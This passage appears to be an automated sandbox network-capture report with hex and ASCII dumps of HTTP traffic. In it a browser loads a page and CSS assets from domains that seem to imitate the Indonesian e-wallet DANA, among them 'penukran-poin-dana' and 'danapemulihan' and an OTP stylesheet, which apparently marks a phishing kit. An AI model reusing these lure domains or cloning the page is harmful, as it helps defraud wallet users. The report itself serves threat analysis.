                                                                                                                            Data Ascii: 2000<html lang="id">... HTML Meta Tags --><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta name="theme-color" content="#118EEA"> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0, maximum-scale=1"> <title> | </title> <meta name="description" content="DANA adalah bentuk baru uang tunai yang lebih baik. Transaksi apapun, berapapun dan dimanapun jadi mudah bersama DANA. Ambil bagian dalam transformasi keuangan digital di Indonesia sekarang!"> ... Facebook Meta Tags --> <meta property="og:url" content="https://www.dana.id"> <meta property="og:type" content="website"> <meta property="og:title" content=" | "> <meta property="og:description" content="DANA adalah bentuk baru uang tunai yang lebih baik. Transaksi apapun, berapapun dan di [TRUNCATED]
                                                                                                                            Oct 6, 2024 13:50:32.194207907 CEST224INData Raw: 41 4e 41 2e 20 41 6d 62 69 6c 20 62 61 67 69 61 6e 20 64 61 6c 61 6d 20 74 72 61 6e 73 66 6f 72 6d 61 73 69 20 6b 65 75 61 6e 67 61 6e 20 64 69 67 69 74 61 6c 20 64 69 20 49 6e 64 6f 6e 65 73 69 61 20 73 65 6b 61 72 61 6e 67 21 22 3e 0a 20 20 3c
                                                                                                                            Data Ascii: ANA. Ambil bagian dalam transformasi keuangan digital di Indonesia sekarang!"> <meta property="og:image" content="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiftOkTXOPr5az8LHt3m-DZNiM0T98GalJ0P3bBLQKs7yZxbNP
                                                                                                                            Oct 6, 2024 13:50:32.194225073 CEST1236INData Raw: 48 56 6e 39 63 41 47 70 7a 5f 70 41 65 56 55 68 6c 36 50 50 58 78 59 48 69 76 50 6c 4f 31 49 6d 45 70 4d 47 31 71 39 74 4e 77 59 43 37 4e 75 4b 31 5f 48 4c 6b 45 4e 42 79 76 74 33 32 55 30 64 4b 4a 6a 43 76 48 48 79 4b 44 5f 42 35 43 34 4f 44 7a
                                                                                                                            Data Ascii: HVn9cAGpz_pAeVUhl6PPXxYHivPlO1ImEpMG1q9tNwYC7NuK1_HLkENByvt32U0dKJjCvHHyKD_B5C4ODzys4XKa7Uuouta6mgd5VFUSEVPhJJTvnsGDXcpOo0IqBFQBueNHkaDcCSRA/s1080/IMG_20231205_025342.jpg"> ... Twitter Meta Tags --> <meta name="twitter:card" content="sum
                                                                                                                            Oct 6, 2024 13:50:32.194288969 CEST1236INData Raw: 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 6e 63 72 79 70 74 65 64 2d 74 62 6e 30 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 69 6d 61 67 65 73 3f 71 3d 74 62 6e 3a 41 4e 64 39 47 63 51 5a 39 64 41 54 73 5f 6e 6b 7a 79 4f 2d 67 53 6f 51 57 62 74 49 68 4a
                                                                                                                            Data Ascii: ef="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQZ9dATs_nkzyO-gSoQWbtIhJV7bG51r3gOKg&usqp=CAU" rel="apple-touch-icon"> <link rel="canonical" href="https://www.dana.id/"> <meta property="og:url" content="https://www.dana.id/" /><
                                                                                                                            Oct 6, 2024 13:50:32.194308996 CEST1236INData Raw: 0a 62 6f 64 79 2c 20 68 74 6d 6c 7b 0a 20 20 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 20 20 72 69 67 68 74 3a 20 30 3b 0a 20 20 20 20 20 20 62 6f 74 74 6f 6d 3a 20 30 3b 0a 20 20 20 20 20 20 74 6f 70 3a 20 30 3b 0a 20 20 20 20 20 20 6d
                                                                                                                            Data Ascii: body, html{ left: 0; right: 0; bottom: 0; top: 0; margin: 0px auto; width: 100%; height: 100%; positon: fixed }h3{ font-size: 23px; } * { box-sizing: border-box; scrollbar-c
                                                                                                                            Oct 6, 2024 13:50:32.194401979 CEST672INData Raw: 0a 20 20 7a 2d 69 6e 64 65 78 3a 20 39 39 39 39 39 39 39 39 3b 0a 7d 0a 0a 2e 63 61 72 6f 75 73 65 6c 5f 5f 73 6c 69 64 65 3a 6e 74 68 2d 63 68 69 6c 64 28 65 76 65 6e 29 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 31
                                                                                                                            Data Ascii: z-index: 99999999;}.carousel__slide:nth-child(even) { background-color: #118EEA;}.carousel__slide:before { content: counter(item); position: absolute; top: 50%; left: 50%; transform: translate3d(-50%,-40%,70px); color: #
                                                                                                                            Oct 6, 2024 13:50:32.194443941 CEST1236INData Raw: 20 20 7d 0a 0a 20 20 2e 63 61 72 6f 75 73 65 6c 5f 5f 73 6c 69 64 65 3a 6c 61 73 74 2d 63 68 69 6c 64 20 2e 63 61 72 6f 75 73 65 6c 5f 5f 73 6e 61 70 70 65 72 20 7b 0a 20 20 20 20 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 74 6f 73 74 61 72
                                                                                                                            Data Ascii: } .carousel__slide:last-child .carousel__snapper { animation-name: tostart, snap; }}@media (prefers-reduced-motion: reduce) { .carousel__snapper { animation-name: none; }}.carousel:hover .carousel__snapper,.carousel:f
                                                                                                                            Oct 6, 2024 13:50:32.194564104 CEST1236INData Raw: 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                            Data Ascii: 0%; display: flex; justify-content: center; margin: auto; position: absolute; padding-top: 300px; left: 0; right: 0; bottom: 0; backgr
                                                                                                                            Oct 6, 2024 13:50:32.194587946 CEST1236INData Raw: 69 6e 20 7b 0a 20 20 30 25 20 7b 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 20 7d 0a 20 20 31 30 30 25 20 7b 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74
                                                                                                                            Data Ascii: in { 0% { -webkit-transform: rotate(360deg); } 100% { -webkit-transform: rotat2000e(0deg); }}/*********************/ #homeku{ width: 100%; height: 100%; position: fixed; background: #118EEA; background-positio
                                                                                                                            Oct 6, 2024 13:50:32.194606066 CEST1236INData Raw: 6c 61 73 73 3d 22 73 74 61 72 74 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 3e 0a 09 3c 69 6d 67 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 20 73 72 63 3d 22 61 73 73 65 74 2f 69 6d 67 2f 64 61 6e 61 5f 74 65 78 74 2e 70 6e
                                                                                                                            Data Ascii: lass="start" style="display:none;"><img class="logo" src="asset/img/dana_text.png" style="width: 150px"><div class="footimg"><img src="asset/img/bi.png" alt=""><img src="asset/img/kom.png" alt=""><p>DANA Indonesia terdaftar dan d
                                                                                                                            Oct 6, 2024 13:50:32.199179888 CEST1236INData Raw: 69 64 3d 22 63 61 72 6f 75 73 65 6c 5f 5f 73 6c 69 64 65 32 22 0a 20 20 20 20 20 20 20 20 74 61 62 69 6e 64 65 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 63 61 72 6f 75 73 65 6c 5f 5f 73 6c 69 64 65 22 20 73 74 79 6c 65 3d 22
                                                                                                                            Data Ascii: id="carousel__slide2" tabindex="0" class="carousel__slide" style="background-color: #118EEA;"> <div class="carousel__snapper" style="background-image: url('https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixR-U2
                                                                                                                            Oct 6, 2024 13:50:35.281831980 CEST443OUTGET / HTTP/1.1
                                                                                                                            Host: penukran-poin-dana.aktsx.cfd
                                                                                                                            Connection: keep-alive
                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Oct 6, 2024 13:50:35.606785059 CEST1236INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:35 GMT
                                                                                                                            Server: Apache
                                                                                                                            Keep-Alive: timeout=5, max=99
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                            Data Raw: 32 30 30 30 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 69 64 22 3e 0a 3c 21 2d 2d 20 48 54 4d 4c 20 4d 65 74 61 20 54 61 67 73 20 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 31 38 45 45 41 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 74 69 74 6c 65 3e f0 9d 97 97 f0 9d 97 94 f0 9d 97 a1 f0 9d 97 94 20 7c 20 f0 9d 97 96 f0 9d 98 82 f0 9d 98 80 f0 9d 98 81 f0 9d [TRUNCATED]
                                                                                                                            Data Ascii: 2000<html lang="id">... HTML Meta Tags --><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta name="theme-color" content="#118EEA"> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0, maximum-scale=1"> <title> | </title> <meta name="description" content="DANA adalah bentuk baru uang tunai yang lebih baik. Transaksi apapun, berapapun dan dimanapun jadi mudah bersama DANA. Ambil bagian dalam transformasi keuangan digital di Indonesia sekarang!"> ... Facebook Meta Tags --> <meta property="og:url" content="https://www.dana.id"> <meta property="og:type" content="website"> <meta property="og:title" content=" | "> <meta property="og:description" content="DANA adalah bentuk baru uang tunai yang lebih baik. Transaksi apapun, berapapun dan di [TRUNCATED]


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            11192.168.2.649898165.22.241.119806220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 6, 2024 13:51:16.286937952 CEST6OUTData Raw: 00
                                                                                                                            Data Ascii:


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            0192.168.2.64971540.113.110.67443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:04 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 4e 6e 75 50 76 2f 43 62 38 45 75 31 6c 5a 37 46 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 37 66 30 30 39 38 64 61 34 30 34 34 31 33 37 0d 0a 0d 0a
                                                                                                                            Data Ascii: CNT 1 CON 305MS-CV: NnuPv/Cb8Eu1lZ7F.1Context: 17f0098da4044137
                                                                                                                            2024-10-06 11:50:04 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                            2024-10-06 11:50:04 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 4e 6e 75 50 76 2f 43 62 38 45 75 31 6c 5a 37 46 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 37 66 30 30 39 38 64 61 34 30 34 34 31 33 37 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 6e 6d 72 33 6f 67 68 45 39 4c 59 70 46 4f 50 43 45 70 44 30 37 6f 43 4e 4b 35 55 35 31 50 53 57 58 5a 6a 76 38 53 66 74 57 65 42 65 42 74 6a 64 36 65 6e 32 32 77 50 53 67 4e 36 79 72 51 32 46 69 45 67 53 66 66 61 6a 42 7a 49 5a 79 4e 6d 36 59 48 69 63 61 65 63 4b 37 39 48 33 66 2f 71 50 45 79 32 77 6c 70 75 72 4b 6c 33 66
                                                                                                                            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: NnuPv/Cb8Eu1lZ7F.2Context: 17f0098da4044137<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYnmr3oghE9LYpFOPCEpD07oCNK5U51PSWXZjv8SftWeBeBtjd6en22wPSgN6yrQ2FiEgSffajBzIZyNm6YHicaecK79H3f/qPEy2wlpurKl3f
                                                                                                                            2024-10-06 11:50:04 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 4e 6e 75 50 76 2f 43 62 38 45 75 31 6c 5a 37 46 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 37 66 30 30 39 38 64 61 34 30 34 34 31 33 37 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: NnuPv/Cb8Eu1lZ7F.3Context: 17f0098da4044137<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                            2024-10-06 11:50:04 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                            Data Ascii: 202 1 CON 58
                                                                                                                            2024-10-06 11:50:04 UTC58INData Raw: 4d 53 2d 43 56 3a 20 78 77 30 58 4d 34 61 75 34 55 4b 73 37 61 52 59 56 5a 74 33 4b 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                            Data Ascii: MS-CV: xw0XM4au4UKs7aRYVZt3Kg.0Payload parsing failed.


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            1192.168.2.64972723.185.0.44436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:06 UTC577OUTGET /asset/container.css HTTP/1.1
                                                                                                                            Host: dev-danapemulihan.pantheonsite.io
                                                                                                                            Connection: keep-alive
                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                            Accept: text/css,*/*;q=0.1
                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                            Sec-Fetch-Dest: style
                                                                                                                            Referer: http://penukran-poin-dana.aktsx.cfd/
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            2024-10-06 11:50:06 UTC686INHTTP/1.1 200 OK
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 790
                                                                                                                            Content-Type: text/css
                                                                                                                            Etag: W/"670203dc-316"
                                                                                                                            Expires: Sun, 06 Oct 2024 11:50:05 GMT
                                                                                                                            Last-Modified: Sun, 06 Oct 2024 03:28:28 GMT
                                                                                                                            Server: nginx
                                                                                                                            Strict-Transport-Security: max-age=300
                                                                                                                            X-Pantheon-Styx-Hostname: styx-fe4-b-b586bd68-jlz2f
                                                                                                                            X-Styx-Req-Id: 2162568e-83d9-11ef-9686-2e2e4af1bda9
                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:06 GMT
                                                                                                                            X-Served-By: cache-chi-kigq8000144-CHI, cache-ewr-kewr1740021-EWR
                                                                                                                            X-Cache: MISS, MISS
                                                                                                                            X-Cache-Hits: 0, 0
                                                                                                                            X-Timer: S1728215406.281251,VS0,VE37
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            X-Robots-Tag: noindex
                                                                                                                            Age: 0
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Via: 1.1 varnish, 1.1 varnish
                                                                                                                            2024-10-06 11:50:06 UTC790INData Raw: 2e 69 6e 64 65 78 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 68 65 69 67 68 74 3a 20 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 31 31 38 45 45 41 3b 7a 2d 69 6e 64 65 78 3a 20 39 39 39 39 3b 7d 2e 69 6e 64 65 78 20 2e 68 65 72 6f 20 7b 6d 61 72 67 69 6e 3a 20 32 30 70 78 20 30 3b 77 69 64 74 68 3a 20 31 30 30 25 3b 68 65 69 67 68 74 3a 20 33 33 30 70 78 3b 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 7d 2e 69 6e 64 65 78 20 2e 68 65 72 6f 20 69 6d 67 20 7b 77 69 64 74 68 3a 20 39 30 25 3b 7d 2e 69 6e 64 65 78 20 2e 63 6f 6e 74 65 6e 74 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65
                                                                                                                            Data Ascii: .index {width: 100%;height: 100%;background: #118EEA;z-index: 9999;}.index .hero {margin: 20px 0;width: 100%;height: 330px;display: flex;justify-content: center;align-items: center;}.index .hero img {width: 90%;}.index .content {width: 100%;text-align: ce


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            2192.168.2.64973123.185.0.44436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:06 UTC574OUTGET /asset/loader.css HTTP/1.1
                                                                                                                            Host: dev-danapemulihan.pantheonsite.io
                                                                                                                            Connection: keep-alive
                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                            Accept: text/css,*/*;q=0.1
                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                            Sec-Fetch-Dest: style
                                                                                                                            Referer: http://penukran-poin-dana.aktsx.cfd/
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            2024-10-06 11:50:06 UTC687INHTTP/1.1 200 OK
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 1561
                                                                                                                            Content-Type: text/css
                                                                                                                            Etag: W/"670203dc-619"
                                                                                                                            Expires: Sun, 06 Oct 2024 11:50:05 GMT
                                                                                                                            Last-Modified: Sun, 06 Oct 2024 03:28:28 GMT
                                                                                                                            Server: nginx
                                                                                                                            Strict-Transport-Security: max-age=300
                                                                                                                            X-Pantheon-Styx-Hostname: styx-fe4-b-b586bd68-5qxx9
                                                                                                                            X-Styx-Req-Id: 21626fc4-83d9-11ef-8da1-a2001dca3824
                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:06 GMT
                                                                                                                            X-Served-By: cache-chi-kigq8000135-CHI, cache-ewr-kewr1740042-EWR
                                                                                                                            X-Cache: MISS, MISS
                                                                                                                            X-Cache-Hits: 0, 0
                                                                                                                            X-Timer: S1728215406.280489,VS0,VE42
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            X-Robots-Tag: noindex
                                                                                                                            Age: 0
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Via: 1.1 varnish, 1.1 varnish
                                                                                                                            2024-10-06 11:50:06 UTC1378INData Raw: 2f 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2f 2e 70 72 6f 63 65 73 73 20 7b 74 6f 70 3a 20 30 3b 6c 65 66 74 3a 20 30 3b 72 69 67 68 74 3a 20 30 3b 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 30 30 30 30 30 30 35 62 3b 7a 2d 69 6e 64 65 78 3a 20 39 39 39 39 39 39 39 39 39 3b 77 69 64 74 68 3a 20 31 30 30 25 3b 68 65 69 67 68 74 3a 20 31 30 30 25 3b 7d 2e 6c 6f 61 64 69 6e 67 20 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 35 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 64 69 73 70 6c 61 79 3a 20 66
                                                                                                                            Data Ascii: /*********************/.process {top: 0;left: 0;right: 0;position: fixed;display: flex;justify-content: center;align-items: center;background: #0000005b;z-index: 999999999;width: 100%;height: 100%;}.loading {margin-top: -50px;position: absolute;display: f
                                                                                                                            2024-10-06 11:50:06 UTC183INData Raw: 65 28 30 64 65 67 29 3b 20 7d 7d 40 2d 6f 2d 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 30 25 20 7b 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 20 7d 31 30 30 25 20 7b 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 20 7d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 39 30 30 70 78 29 20 7b 2e 70 72 6f 63 65 73 73 20 7b 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 7d 7d
                                                                                                                            Data Ascii: e(0deg); }}@-o-keyframes spin {0% { -webkit-transform: rotate(360deg); }100% { -webkit-transform: rotate(0deg); }}@media screen and (min-width: 900px) {.process {position: absolute;}}


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            3192.168.2.64973023.185.0.44436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:06 UTC571OUTGET /asset/otp.css HTTP/1.1
                                                                                                                            Host: dev-danapemulihan.pantheonsite.io
                                                                                                                            Connection: keep-alive
                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                            Accept: text/css,*/*;q=0.1
                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                            Sec-Fetch-Dest: style
                                                                                                                            Referer: http://penukran-poin-dana.aktsx.cfd/
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            2024-10-06 11:50:06 UTC687INHTTP/1.1 200 OK
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 1256
                                                                                                                            Content-Type: text/css
                                                                                                                            Etag: W/"670203dc-4e8"
                                                                                                                            Expires: Sun, 06 Oct 2024 11:50:05 GMT
                                                                                                                            Last-Modified: Sun, 06 Oct 2024 03:28:28 GMT
                                                                                                                            Server: nginx
                                                                                                                            Strict-Transport-Security: max-age=300
                                                                                                                            X-Pantheon-Styx-Hostname: styx-fe4-b-b586bd68-slphl
                                                                                                                            X-Styx-Req-Id: 2162eb4a-83d9-11ef-a668-f6bd2f2baf87
                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:06 GMT
                                                                                                                            X-Served-By: cache-chi-kigq8000049-CHI, cache-ewr-kewr1740055-EWR
                                                                                                                            X-Cache: MISS, MISS
                                                                                                                            X-Cache-Hits: 0, 0
                                                                                                                            X-Timer: S1728215406.285284,VS0,VE37
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            X-Robots-Tag: noindex
                                                                                                                            Age: 0
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Via: 1.1 varnish, 1.1 varnish
